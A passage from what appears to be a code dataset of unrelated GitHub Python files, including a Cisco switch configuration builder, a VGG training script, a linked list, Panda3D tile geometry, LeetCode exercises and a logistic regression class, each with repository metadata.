InfosVlan=vlan_id_list)\n\ndef test(line: str) -> None:\n print(\n Fore.YELLOW + f\"[+] New line saved : \\n{line}\" + Fore.RESET if line\n else Fore.RED + \"\\nInvalid input.\" + Fore.RESET\n )\n\ndef app_start():\n show_menu()\n try:\n choice = int(input(\"\\nYour selection: \"))\n except ValueError:\n print(Fore.RED + \"\\nInvalid option. Please enter 1-8 or press CTRL+C to exit: \\n\" + Fore.RESET)\n app_start()\n except KeyboardInterrupt:\n print(Fore.RED + \"\\nExiting pyCISCO ...\\n\" + Fore.RESET)\n exit(0)\n else:\n if choice == 1:\n hostname = str(input(\"\\nEnter the name of your device : \"))\n if hostname:\n hostname_line = ConfigSwitch.add_hostname(hostname)\n test(hostname_line)\n\n elif choice == 2:\n enable_pwd = str(input(\"\\nEnter the enable password : \"))\n if enable_pwd:\n enable_pwd_line = ConfigSwitch.add_enable_pwd(enable_pwd)\n test(enable_pwd_line)\n\n elif choice == 3:\n user_pwd_infos = str(input(\"\\nEnter the infos (username:password:password_type(5,7,8,9)): \"))\n if user_pwd_infos:\n user_pwd_device_line = ConfigSwitch.add_user_pwd_line(user_pwd_infos)\n test(user_pwd_device_line)\n\n elif choice == 4:\n vlan_infos = str(input(\"\\nEnter the vlan infos (id:name:ip_address:mask) : \"))\n if vlan_infos:\n vlan_config_line = ConfigSwitch.create_vlan(vlan_infos)\n test(vlan_config_line)\n\n elif choice == 5:\n ip = str(input(\"\\nEnter the ip adress : \"))\n if ip:\n default_gateway_line = ConfigSwitch.add_default_gateway(ip)\n test(default_gateway_line)\n\n elif choice == 6:\n ip_route_infos = str(input(\"\\nEnter the ip infos for ip route (IPdst:MASKdst IPsrc:MASKsrc) : \"))\n if ip_route_infos:\n ip_route_line = ConfigSwitch.add_ip_route(ip_route_infos)\n test(ip_route_line)\n\n elif choice == 7:\n interface_config_lines = ConfigSwitch.configure_interface()\n for interface_config_line in interface_config_lines:\n test(interface_config_line)\n\n elif choice == 8:\n print(Fore.YELLOW + \"\\n[+] Writing configuration in 'config.txt' ...\" + Fore.RESET)\n ConfigSwitch.write_configuration(infos_switch)\n print(Fore.YELLOW + \"\\n[+] Configuration writed\" + Fore.RESET)\n exit(0)\n else:\n print(Fore.RED + \"\\nInvalid option. Please enter 1-8 or press CTRL + C to exit: \\n\" + Fore.RESET)\n app_start()\n\ndef main():\n banner()\n while True:\n app_start()\n\n# Start Here\nif __name__ == \"__main__\":\n main()","repo_name":"0xSp3ctra/pyCISCO","sub_path":"pycisco.py","file_name":"pycisco.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13751216682","text":"# The output data is prepared by representing each output as a binary vector of categories\nimport torch.utils.data as utils\n\ndataset_size = 45000\nnum_epochs = 1\nlog_interval = 500\n\nvgg_model = models.vgg16(pretrained=True).cuda()\nvgg_features = nn.Sequential(*list(vgg_model.features.children())[:])\nvgg_new = nn.Sequential(*list(vgg_model.classifier.children())[:-2])\n\nclass E2E(nn.Module):\n def __init__(self):\n super(E2E, self).__init__()\n self.feature = vgg_features \n self.fc1 = vgg_new\n self.fc2 = cfy_model\n \n def forward(self, x):\n x1= self.feature(x)\n x1 = x1.view(x1.size(0), -1)\n x2 = self.fc1(x1)\n out = self.fc2(x2)\n return out\n \n#transform image \nimg_size = 224\nloader = transforms.Compose([\n transforms.Scale(img_size),\n transforms.CenterCrop(img_size),\n transforms.ToTensor(),\n]) \n\n#load image \ndef load_image(filename):\n image = Image.open(filename).convert('RGB')\n image_tensor = loader(image).float()\n return image_tensor.cuda()\n\n\ntrain_class = []\nval_class = []\n\n#binary target train vector \nfor train_id in train_ids[:45000]: \n temp_class = np.zeros(80)\n for i,category in enumerate(train_id_to_categories[train_id]):\n temp_class[category_to_idx[category]] = 1\n \n train_class.append(temp_class)\n\n#binary target val vector \nfor val_id in val_ids[:100]: \n temp_class = np.zeros(80)\n for i,category in enumerate(val_id_to_categories[val_id]):\n temp_class[category_to_idx[category]] = 1\n \n val_class.append(temp_class)\n \ntensor_x_val = torch.stack([load_image(val_id_to_file[k]) for k in val_ids[:50]]) \ntensor_y_val = torch.stack([torch.Tensor(i) for i in val_class[:50]])\n\n#train fn\ndef train(comb_model,learning_rate,batch_size,num_epochs):\n \n criterion = nn.MultiLabelSoftMarginLoss() \n optimizer = torch.optim.Adam(comb_model.parameters(), lr=learning_rate)\n \n for epoch in range(num_epochs):\n loss_vector_train = [] \n loss_vector_val = [] \n for b in range(int(dataset_size/batch_size)):\n \n tensor_x = torch.stack([load_image(train_id_to_file[k]) for k in train_ids[batch_size*b:batch_size*(b+1)]])\n tensor_y = torch.stack([torch.Tensor(i) for i in train_class[batch_size*b:batch_size*(b+1)]])\n \n # Convert torch tensor to Variable\n img = Variable(tensor_x)\n labels = Variable(torch.FloatTensor(tensor_y)).cuda()\n \n comb_model.train()\n # Forward + Backward + Optimize\n optimizer.zero_grad() # zero the gradient buffer\n outputs = comb_model(img)\n loss_train = criterion(outputs, labels)\n loss_train.backward()\n optimizer.step()\n \n loss_vector_train.append(loss_train.data[0])\n \n comb_model.eval()\n out_val = comb_model(Variable(tensor_x_val))\n labels_val = Variable(torch.FloatTensor(tensor_y_val)).cuda()\n loss_val = criterion(out_val, labels_val)\n \n loss_vector_val.append(loss_val.data[0])\n \n if (b % log_interval == 0): \n print('batch %d %.6f %.6f' %(b,loss_train.data[0],loss_val.data[0]))\n \n #print(len(loss_vector))\n np.save(open('outputs/loss_vector_train'+str(learning_rate)+str(batch_size), 'wb+'), loss_vector_train) \n np.save(open('outputs/loss_vector_val'+str(learning_rate)+str(batch_size), 'wb+'), loss_vector_val) \n \n# Finally train the model\n\nlearning_rate_vec = [0.001,0.0001,0.00001]\nbatch_size_vec = [25,40,50]\nfor lr in learning_rate_vec:\n for bs in batch_size_vec:\n comb_model = E2E()\n comb_model.cuda()\n train(comb_model,lr, bs, num_epochs)\n torch.save(comb_model.state_dict(), './comb_model'+str(lr)+str(bs)+'.pth')\n\n\n\nprint('training done')","repo_name":"kevinbdsouza/ObjectDetection","sub_path":"hyperparameter.py","file_name":"hyperparameter.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10500512942","text":"# Linked List in python\n# Node class\n# Node class has a constructor that sets the data passed in, and optionally\n# and prev_node\n# It also has a str method to give a string representation for printing.\n# Note that prev_node is only used for Doubly Linked Lists.\n# Operations: Add, Find, Remove, Print_list\n\n\nclass Node:\n\n def __init__(self, d, n=None, p=None):\n\n self.data = d\n self.next_node = n\n self.prev_node = p\n\n def __str__(self):\n return '(' + str(self.data) + ')'\n\n\nclass LinkedList:\n\n def __init__(self, r=None):\n\n self.root = r\n self.size = 0\n\n def add(self, d):\n\n new_node = Node(d, self.root)\n self.root = new_node\n self.size += 1\n\n def find(self, d):\n\n this_node = self.root\n\n while this_node is not None:\n if this_node.data == d:\n return d\n else:\n this_node = this_node.next_node\n return None\n\n def remove(self, d):\n\n this_node = self.root\n prev_node = None\n\n while this_node is not None:\n\n if this_node.data == d:\n\n if prev_node is not None:\n prev_node.next_node = this_node.next_node\n\n else:\n self.root = this_node.next_node\n self.size -= 1\n return True\n\n else:\n\n prev_node = this_node\n this_node = this_node.next_node\n\n return False\n\n def print_list(self):\n\n this_node = self.root\n while this_node is not None:\n print(this_node, end='->')\n this_node = this_node.next_node\n print('None')\n\n\nmy_list = LinkedList()\nmy_list.add(5)\nmy_list.add(8)\nmy_list.add(12)\nmy_list.print_list()\n\nprint(\"size=\"+str(my_list.size))\nmy_list.remove(8)\nprint(\"size=\"+str(my_list.size))\nprint(my_list.find(5))\nprint(my_list.root)\n\n\n\n","repo_name":"SamanehGhafouri/DataStructuresInPython","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23144228626","text":"class LightBulb:\n @staticmethod\n def turn_on():\n print(\"LightBulb: turned on...\")\n\n @staticmethod\n def turn_off():\n print(\"LightBulb: turned off...\")\n\n\nclass ElectricPowerSwitch:\n\n def __init__(self, light_bulb: LightBulb):\n self.lightBulb = light_bulb\n self.on = False\n\n def press(self):\n if self.on:\n self.lightBulb.turn_off()\n self.on = False\n else:\n self.lightBulb.turn_on()\n self.on = True\n\n\nif __name__ == '__main__':\n lb = LightBulb()\n switch = ElectricPowerSwitch(lb)\n switch.press()\n switch.press()\n","repo_name":"aviz92/PythonCourses","sub_path":"PythonCourses/BetterPython/N2_dependency_inversion/dependency-inversion-before.py","file_name":"dependency-inversion-before.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11136124965","text":"from panda3d.core import *\r\nimport math\r\n\r\n\r\nclass Tile():\r\n \"\"\"\r\n Create a thin (zscale reduced) tile object based on a polygonal prism,\r\n with the correct texture or colour, with collider nodes at the tips, and\r\n an optional large one (if the tile is square) at the c of g. Shape can be\r\n scaled (scale), and rotated (phase). The symmetric rotation specifier (sym_rot)\r\n was included to identify when a spinning tile could stop spinning - eg 90 degrees\r\n for a square tile vs 180 degrees for a rectagle and 360 degrees for a triangle,\r\n but is not important now that tiles are moved with a fixed orientation.\r\n \"\"\"\r\n\r\n def __init__(self, pos, shape, face_color, tip_rad, p_tag=\"fred\", zscale=0.05, name=\"Tile\",\r\n cg=[0,0], cg_rad=1, sym_rot=90, phase=0, scale=1, hopper=False):\r\n self.sym_rot = sym_rot\r\n self.phase = phase\r\n self.name = p_tag\r\n\r\n if isinstance(face_color, tuple):\r\n # if it is a tuple, then it is an RGBA\r\n self.gNode = TilePoly(shape, face_color)\r\n self.np = render.attachNewNode(self.gNode.node)\r\n self.np.setScale(scale, scale, zscale)\r\n else:\r\n # otherwise assume it is a texture string path\r\n white = (1, 1, 1, 1)\r\n self.gNode = TilePoly(shape, white)\r\n self.np = render.attachNewNode(self.gNode.node)\r\n self.np.setScale(scale, scale, zscale)\r\n tex1 = loader.loadTexture(face_color)\r\n self.np.setTexture(tex1)\r\n self.np.setPos(pos)\r\n self.np.setH(phase)\r\n\r\n colliderNode = CollisionNode(\"collider\" + name)\r\n # Add central collider node\r\n if hopper:\r\n colliderNode.addSolid(CollisionSphere(*cg, 0, (cg_rad + tip_rad)/scale))\r\n # Add the satellite collision solids and location identifier nodes\r\n # at the corners, compensating for scale so that the collision solids\r\n # are the same size regardless of tile scale\r\n for i, corner in enumerate(shape):\r\n colliderNode.addSolid(CollisionSphere(*corner, 0, tip_rad/scale))\r\n corner_node = self.np.attachNewNode('cnr' + str(i))\r\n corner_node.setPos(*corner, 0)\r\n\r\n self.collider = self.np.attachNewNode(colliderNode)\r\n self.collider.setPythonTag(\"owner\", self)\r\n self.collider.show()\r\n\r\n def corner_nodes(self):\r\n return sorted(self.np.findAllMatches('cnr*'), key=lambda np: np.name)\r\n\r\n\r\nclass TilePoly():\r\n \"\"\"\r\n Generate a 3D solid in xyz plane from a 2D polygon in xy plane\r\n \"\"\"\r\n\r\n def __init__(self, shape, face_color):\r\n # 2D Polygon and its 2D normals\r\n self.xys = shape[:]\r\n xy_normals = calcNormals(self.xys)\r\n\r\n \"\"\"\r\n Coverage triangle indices for the top polygonal face (counter clockwise - illustrated) and\r\n bottom polygonal face (clockwise - not shown). Fails for some concave polygons like the cross.\r\n \r\n .4 \r\n . \\\r\n . .3\r\n . . | \r\n . . .2\r\n .. . /\r\n 0 --- 1\r\n \"\"\"\r\n tri_top = [[0, vix + 1, vix + 2] for vix in range(len(self.xys) - 2)]\r\n tri_bot = [[0, vix - 1, vix - 2] for vix in range(len(self.xys), 2, -1)]\r\n\r\n # To hold vertex numbers belonging to the rectangular faces whose normals are xy normals\r\n rects = {}\r\n\r\n \"\"\"\r\n Forward (counter clockwise) and back (clockwise) triangle indices for covering rectangular faces\r\n 2 --------- 3\r\n | b f |\r\n | x |\r\n | f b |\r\n 0 --------- 1\r\n \"\"\"\r\n tri_fwd = [[0, 1, 3], [0, 3, 2]]\r\n tri_back = [[1, 0, 2], [1, 2, 3]]\r\n\r\n # Bottom face then top face\r\n zs = [-1, 1]\r\n\r\n # To hold vertex numbers belonging to the bottom and top faces\r\n polys = {}\r\n\r\n # All the vertex positions of the solid\r\n xyzs = [xy + [z] for z in zs for xy in self.xys]\r\n\r\n # There must be 3 separate vertices at each vertex position, each with a different normal,\r\n # which always points outwards from the solid\r\n format = GeomVertexFormat.getV3n3c4()\r\n vertexData = GeomVertexData('prism', format, Geom.UHStatic)\r\n vertexData.setNumRows(3 * len(xyzs))\r\n\r\n vertices = GeomVertexWriter(vertexData, 'vertex')\r\n normals = GeomVertexWriter(vertexData, 'normal')\r\n colors = GeomVertexWriter(vertexData, 'color')\r\n\r\n # sat is saturated 8 bits (+ 1) to use as denominator\r\n sat = 256\r\n white = (1, 1, 1, 1)\r\n brown = (0xa0 / sat, 0x98 / sat, 0x7c / sat, 1)\r\n\r\n for pos_num, xyz in enumerate(xyzs):\r\n edge_fwd = pos_num % len(self.xys)\r\n edge_back = (edge_fwd - 1) % len(self.xys)\r\n edge_nums = [edge_back, edge_fwd]\r\n for i in range(3):\r\n vertices.addData3f(*xyz)\r\n vnum = pos_num * 3 + i\r\n if i in [0, 1]:\r\n edge_num = edge_nums[i]\r\n normal = xy_normals[edge_num] + [0]\r\n rects.setdefault(edge_num, []).append(vnum)\r\n else:\r\n z_vec = xyz[2]\r\n normal = [0, 0, z_vec]\r\n polys.setdefault(z_vec, []).append(vnum)\r\n\r\n normals.addData3f(*normal)\r\n color = white if normal[2] == -1 else face_color\r\n colors.addData4f(color)\r\n\r\n # Store the tessellation triangles, counter clockwise from front.\r\n # Each vertex assigned to a triangle must have a normal vector that\r\n # points outwards from the triangle face, which thus determines which\r\n # of the 3 possible vertexes to chose at any given vertex position.\r\n # Each triangle's vertices should be specified in counter clockwise\r\n # order from the perspective of the vertices' normals (i.e. looking at the\r\n # outside of the face).\r\n primitive = GeomTriangles(Geom.UHStatic)\r\n\r\n # Cover the rectangular faces around the edges\r\n for edge_num in rects:\r\n # cater for wrap around back to the zeroth edge number\r\n tri_ix_pairs = tri_back if edge_num == (len(self.xys) - 1) else tri_fwd\r\n for tri_ixs in tri_ix_pairs:\r\n vnums = [rects[edge_num][tri_ix] for tri_ix in tri_ixs]\r\n primitive.addVertices(*vnums)\r\n\r\n # Cover the polygonal faces on the top and bottom\r\n for poly in polys:\r\n # Use clockwise indexing on the bottom (negative normal) face and\r\n # counter clockwise on the top (positive normal) face\r\n faces = tri_bot if poly < 0 else tri_top\r\n for tri_ixs in faces:\r\n vnums = [polys[poly][tri_ix] for tri_ix in tri_ixs]\r\n primitive.addVertices(*vnums)\r\n\r\n geom = Geom(vertexData)\r\n geom.addPrimitive(primitive)\r\n\r\n self.node = GeomNode('prism gnode')\r\n self.node.addGeom(geom)\r\n\r\n\r\nclass Vector2D():\r\n \"\"\"\r\n 2D working in x-y plane with z = 0\r\n \"\"\"\r\n\r\n def __init__(self, p1, p2):\r\n self.p1 = p1\r\n self.p2 = p2\r\n self.dx = p2.x - p1.x\r\n self.dy = p2.y - p1.y\r\n self.hyp2 = self.dx * self.dx + self.dy * self.dy\r\n self.hyp = math.sqrt(self.hyp2)\r\n\r\n def norm_2D(self):\r\n return Vec3D(self.dy / self.hyp, -self.dx / self.hyp, 0)\r\n\r\n def tan_2D(self):\r\n return Vec3D(self.dx / self.hyp, self.dy / self.hyp, 0)\r\n\r\n def dist_from_2D(self, p, infinite=False):\r\n \"\"\" Distance of p0 from line segment or line through p1 and p2 \"\"\"\r\n t = ((p.x - self.p1.x) * self.dx + (p.y - self.p1.y) * self.dy) / self.hyp2\r\n if t < 0 and not infinite:\r\n # closest is p1\r\n d2x = p.x - self.p1.x\r\n d2y = p.y - self.p1.y\r\n elif t > 1 and not infinite:\r\n # closest is p2\r\n d2x = p.x - self.p2.x\r\n d2y = p.y - self.p2.y\r\n else:\r\n # closest is a projection onto the line\r\n d2x = p.x - (self.p1.x + t * self.dx)\r\n d2y = p.y - (self.p1.y + t * self.dy)\r\n return math.sqrt(d2x * d2x + d2y * d2y)\r\n\r\n\r\ndef normal_2D(p1, p2):\r\n \"\"\"\r\n 2D working in x-y plane with points represented as 2 element lists.\r\n Mapping is y2 = p2[1], x2 = p2[0], y1 = p1[1], x1 = p1[0]\r\n \"\"\"\r\n x_diff = p2[0] - p1[0]\r\n y_diff = p2[1] - p1[1]\r\n hyp = math.sqrt(x_diff * x_diff + y_diff * y_diff)\r\n # right hand normal circulating counter clockwise\r\n return [y_diff / hyp, -x_diff / hyp]\r\n\r\ndef rotate_by_1(my_list):\r\n return my_list[1:] + my_list[:1]\r\n\r\ndef calcNormals(points):\r\n return [normal_2D(p1, p2) for p1, p2 in zip(points, rotate_by_1(points))]\r\n\r\nif __name__ == '__main__':\r\n p1 = Vec3D(1, 2, 0)\r\n p2 = Vec3D(5, 7, 0)\r\n p3 = Vec3D(52, 3, 0)\r\n seg = Vector2D(p1, p2)\r\n dp3 = seg.dist_from_2D(p3)\r\n inf_dp3 = seg.dist_from_2D(p3, infinite=True)\r\n print('dp3', dp3)\r\n print('inf_dp3', inf_dp3)\r\n\r\n\r\n\r\n\r\n","repo_name":"friedgit/victorian-tiled-path","sub_path":"tile_poly.py","file_name":"tile_poly.py","file_ext":"py","file_size_in_byte":9210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33355616491","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\n\n\ndef get_logger(name=__name__, stream=False):\n formatter = logging.Formatter('[%(levelname)s] %(asctime)s %(filename)s:\\n %(message)s\\n')\n logger = logging.getLogger(name)\n\n file_handler = logging.FileHandler(name + '.log') # Instantiate the file handler\n file_handler.setFormatter(formatter)\n file_handler.setLevel(logging.WARNING) # only logs warnings level or higher\n logger.addHandler(file_handler)\n\n if stream:\n stream_handler = logging.StreamHandler() # Instantiate the stream handler AKA the console\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(logging.DEBUG) # shows everything on console\n logger.addHandler(stream_handler)\n\n # We add both handlers to the logger\n\n logger.setLevel(logging.DEBUG) # Logger registers all logs\n\n return logger\n","repo_name":"CoreDumped-ETSISI/core-dumped-telegram-bot","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"74832647506","text":"n,m = map(int,input().split())\nstrings = []\nchecks = []\nfor i in range(n):\n strings.append(input())\nfor i in range(m):\n checks.append(input())\ncount = 0\nfor check in checks:\n if check in strings:\n count +=1\nprint(count) \n","repo_name":"Jarry-Ha/TIL_github","sub_path":"1_python/1.study/2.baekjoon/14425.py","file_name":"14425.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5732878137","text":"#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\nimport os\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\nimport tensorflow as tf\r\ntfconfig = tf.ConfigProto()\r\ntfconfig.gpu_options.allow_growth = True\r\nsession = tf.Session(config=tfconfig)\r\nimport sys\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nimport keras\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import *\r\nfrom keras.preprocessing import sequence\r\nfrom keras.regularizers import l2\r\nfrom keras import backend as K\r\nfrom keras.engine.topology import Layer\r\nfrom keras.backend.tensorflow_backend import set_session\r\nimport time\r\nfrom tensorflow.contrib import learn\r\nfrom sklearn.model_selection import train_test_split\r\nimport keras.backend as K\r\nfrom keras.callbacks import TensorBoard\r\nfrom keras.callbacks import Callback\r\nfrom sklearn.metrics import log_loss\r\nfrom keras.activations import softmax\r\nsys.path.append('models')\r\nfrom CNN import cnn_v1, cnn_v2, model_conv1D_, Siamese_LSTM, drmm_tks\r\nfrom ESIM import esim, decomposable_attention\r\nfrom ABCNN import ABCNN\r\nfrom bimpm import bimpm\r\nsys.path.append('utils/')\r\nsys.path.append('feature/')\r\nimport config\r\nfrom Feats import data_2id, add_hum_feats\r\nfrom help import score, train_batch_generator, train_batch_generator3, train_test, get_X_Y_from_df\r\nfrom CutWord import read_cut,read_cut_es\r\n\r\ndef load_data():\r\n print('load data')\r\n data = read_cut_es() #cut word\r\n print(data)\r\n data = data_2id(data,['q1_es_cut','q2_es_cut']) # 2id\r\n print(data)\r\n data = add_hum_feats(data,config.train_feats) #生成特征并加入\r\n data = add_hum_feats(data, config.train_feats) # 生成特征并加入\r\n\r\n x_train, y_train = get_X_Y_from_df(data, config.data_augment)\r\n print(len(x_train[2]))\r\n \r\n return x_train, y_train\r\n\r\n\r\ndef make_train_cv_data(X_train, Y_train, Model, model_name, epoch_nums, kfolds):\r\n\r\n from keras.models import model_from_json\r\n\r\n json_string = Model.to_json()\r\n\r\n S_train = np.zeros((Y_train.shape[0], epoch_nums))\r\n S_Y = np.zeros((Y_train.shape[0], 1))\r\n\r\n train_df = pd.DataFrame()\r\n X, Y = X_train, Y_train\r\n from sklearn.model_selection import KFold\r\n kf = KFold(n_splits=kfolds, shuffle=True)\r\n k = 0\r\n \r\n epoch_nums =1 \r\n p, r, f ,l= [], [], [] ,[] \r\n for train_index, test_index in kf.split(Y):\r\n k += 1\r\n model = model_from_json(json_string)\r\n model.compile(loss='binary_crossentropy',\r\n optimizer='adam', metrics=['acc'])\r\n K.set_value(model.optimizer.lr, 0.005)\r\n for epoch_num in range(epoch_nums):\r\n \r\n if config.feats == []:\r\n x_train = [X[0][train_index, :], X[1][train_index, :], X[2][train_index]]\r\n x_dev = [X[0][test_index, :], X[1][test_index, :],X[2][test_index]] \r\n else:\r\n \r\n x_train = [X[0][train_index, :], X[1][train_index, :], X[2][train_index, :]]\r\n x_dev = [X[0][test_index, :], X[1][test_index, :],X[2][test_index, :]] \r\n y_train=Y[train_index,:]\r\n y_dev = Y[test_index, :]\r\n print('kf: ', k)\r\n print('epoch_num: ', epoch_num + 1)\r\n # print(x_train[0].shape, x_train[1].shape,\r\n # x_train[2].shape, y_train.shape)\r\n # print(x_dev[0].shape, x_dev[1].shape, x_dev[2].shape, y_dev.shape)\r\n\r\n model.fit_generator(\r\n train_batch_generator3(x_train, y_train, config.batch_size),\r\n epochs=5,\r\n steps_per_epoch=int(y_train.shape[0] / config.batch_size),\r\n validation_data=(x_dev, y_dev),\r\n class_weight={0: 1, 1: 4},\r\n\r\n )\r\n pred = model.predict(x_dev, batch_size=config.batch_size)\r\n pre, rec, f1 = score(y_dev, pred)\r\n \r\n loss = log_loss(y_dev, pred)\r\n \r\n S_train[test_index, epoch_num] = pred[:, 1]\r\n print('p r f1 ', pre, rec, f1)\r\n print('logloss:',loss)\r\n train_df['epoch_{0}'.format(epoch_num)] = S_train[:, epoch_num]\r\n train_df['label'] = Y_train[:, 1]\r\n p.append(pre)\r\n r.append(rec)\r\n f.append(f1)\r\n l.append(loss)\r\n \r\n model.save(config.stack_path+\"_%s_%s.h5\" %\r\n (model_name, k))\r\n print('p r f1 logloss')\r\n print(np.array([p, r, f, l]))\r\n print('mean :', np.mean(np.array([p, r, f, l]),axis=1))\r\n train_df.to_csv(config.stack_path+'train_%s.csv' % (k),\r\n index=False, )\r\n\r\n\r\ndef do_train_cv(model_name, model, epoch_nums, kfolds):\r\n X_train, Y_train = load_data()\r\n make_train_cv_data(X_train, Y_train, model, model_name, epoch_nums, kfolds)\r\n\r\n\r\ndef main(model_name):\r\n print('model name', model_name)\r\n if model_name == 'bimpm':\r\n model = bimpm()\r\n if model_name == 'drmmt':\r\n model = drmm_tks()\r\n\r\n if model_name == 'cnn':\r\n\r\n model = model_conv1D_()\r\n if model_name == 'slstm':\r\n\r\n model = Siamese_LSTM()\r\n\r\n if model_name == 'esim':\r\n model = esim()\r\n\r\n if model_name == 'dam':\r\n model = decomposable_attention()\r\n if model_name == 'abcnn':\r\n\r\n model = ABCNN(\r\n left_seq_len=config.word_maxlen, right_seq_len=config.word_maxlen, depth=3,\r\n nb_filter=100, filter_widths=[5, 4, 3],\r\n collect_sentence_representations=True, abcnn_1=True, abcnn_2=True,\r\n # mode=\"euclidean\",\r\n mode=\"cos\",\r\n # mode='dot'\r\n )\r\n do_train_cv(model_name, model, epoch_nums=1, kfolds=5)\r\n #train(x_train, y_train, x_dev, y_dev, model_name, model)\r\n\r\nif __name__ == '__main__':\r\n\r\n main(sys.argv[1])\r\n # do_cv()\r\n","repo_name":"zle1992/CIKM","sub_path":"cv.py","file_name":"cv.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19022866175","text":"#Given an array, rotate the array to the right by k steps, where k is non-negative.\nnums=[-1,-100,3,99]\nk = 2\n\nwhile k>0:\n\tnums.insert(0,nums.pop(-1))\n\tk=k-1\n\nprint(nums)\nprint(\"\\r\")\n\n\n#Given an array of integers and an integer k, find out whether there are two distinct indices i and j in \n#the array such that nums[i] = nums[j] and the absolute difference between i and j is at most k.\nnums = [1,0,1,1]\nk = 1\nflag=0\n\nd={}\n\nfor i,n in enumerate(nums):\n\tif n not in d:\n\t\td[n]=i\n\telse:\n\t\tif i-d[n]<=k:\n\t\t\tflag=1\n\t\telse:\n\t\t\td[n]=i\n\n\nif flag==0:\n\tprint(\"false\")\nelse:\n\tprint(\"true\")\nprint(\"\\r\")\n\n\n#Given an array containing n distinct numbers taken from 0, 1, 2, ..., n, find the one that is missing from the array.\nnums=[1]\n\nn=len(nums)\n\nsumm=(n*(n+1))//2\nif summ!=sum(nums):\n\tif summ>sum(nums):\n\t\tprint(summ-sum(nums))\n\telse:\n\t\tprint(sum(nums)-summ)\n\nif (summ==1 and n==1) or (summ==sum(nums) and 0 not in nums):\n\tprint(\"0\")\nprint(\"\\r\")\n\n\n\n#Given an array nums, write a function to move all 0's to the end of it while maintaining the relative order of the non-zero elements.\n#method 1 \nnums=[0,1,0,3,12]\ni=0\nwhile sum(nums[i:])!=0:\n\tif nums[i]==0:\n\t\tnums.append(0)\n\t\tnums.pop(i)\n\telse:\n\t\ti=i+1\n\nprint(nums)\n\n#method 2 \nnums=[0,1,0,3,12]\nc = 0\ni=0\nwhile c 1:\n\t\tnums.insert(v+1,nums[v]+1)\n\tv=v+1\n\tk=k+1\n\nprint(nums)\n\n\n\n\n","repo_name":"Pm1995/Leetcode-","sub_path":"Leetcode(ARRAYS_2).py","file_name":"Leetcode(ARRAYS_2).py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38345380960","text":"import numpy as np\nimport pandas as pd\n\n# IMPORTANT: DO NOT USE ANY OTHER 3RD PARTY PACKAGES\n# (math, random, collections, functools, etc. are perfectly fine)\n\n\nclass LogisticRegression:\n\n def __init__(self):\n self.weights = []\n\n def fit(self, xe, ye, learning_rate, num_iters):\n\n y = np.array(ye)[:, np.newaxis]\n x = np.array(xe)\n X = self.feature_engineering(x[:, 0], x[:, 1])\n\n weights = np.array(X).shape[1]\n weights = np.full((weights, 1), 0, dtype=np.float64)\n\n weights = self.adjust_parameters(\n X, y, weights, learning_rate, num_iters)\n self.weights = weights\n\n def feature_engineering(self, column_1, column_2):\n num_samples = len(column_1)\n # Initialize the feature matrix with a column of ones for the bias term.\n features = np.ones((num_samples, 1))\n\n # Add features that by trail and error seems to fit the datasets quite well. As well as the original features.\n new_feature = (column_2)\n new_feature = new_feature[:, np.newaxis]\n features = np.append(features, new_feature, axis=1)\n\n new_feature = column_1\n new_feature = new_feature[:, np.newaxis]\n features = np.append(features, new_feature, axis=1)\n\n new_feature = column_1**2/2**2 + column_2**2\n new_feature = new_feature[:, np.newaxis]\n features = np.append(features, new_feature, axis=1)\n\n return features\n\n def predict(self, xe):\n\n x = np.array(xe)\n X = self.feature_engineering(x[:, 0], x[:, 1])\n\n return (sigmoid(np.dot(X, self.weights)) > 0.5).ravel()\n\n def adjust_parameters(self, x, y, weights, learning_rate, num_iters):\n\n for i in range(num_iters):\n # Calculate predictions\n predictions = sigmoid(np.dot(x, weights))\n\n # Calculate the error (how wrong the predictions are)\n error = predictions - y\n\n # Calculate how much we need to adjust the parameters (weights)\n gradient = np.dot(x.T, error) / len(y)\n weights -= learning_rate * gradient\n\n return weights\n\n# --- Some utility functions\n\n\ndef binary_accuracy(y_true, y_pred, threshold=0.5):\n\n assert np.array(y_true).shape == np.array(y_pred).shape\n y_pred_thresholded = (np.array(y_pred) >= threshold).astype(float)\n correct_predictions = y_pred_thresholded == y_true\n return correct_predictions.mean()\n\n\ndef binary_cross_entropy(y_true, y_pred, eps=1e-15):\n\n assert np.array(y_true).shape == np.array(y_pred).shape\n y_pred = np.clip(np.array(y_pred), eps, 1 - eps) # Avoid log(0)\n return - np.mean(\n np.array(y_true) * np.log(np.array(y_pred)) +\n (1 - np.array(y_true)) * (np.log(1 - np.array(y_pred)))\n )\n\n\ndef sigmoid(x):\n\n return 1. / (1. + np.exp(-x))\n","repo_name":"petersagdahl/ml_individual","sub_path":"logistic_regression/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11737132983","text":"from selenium.webdriver.common.by import 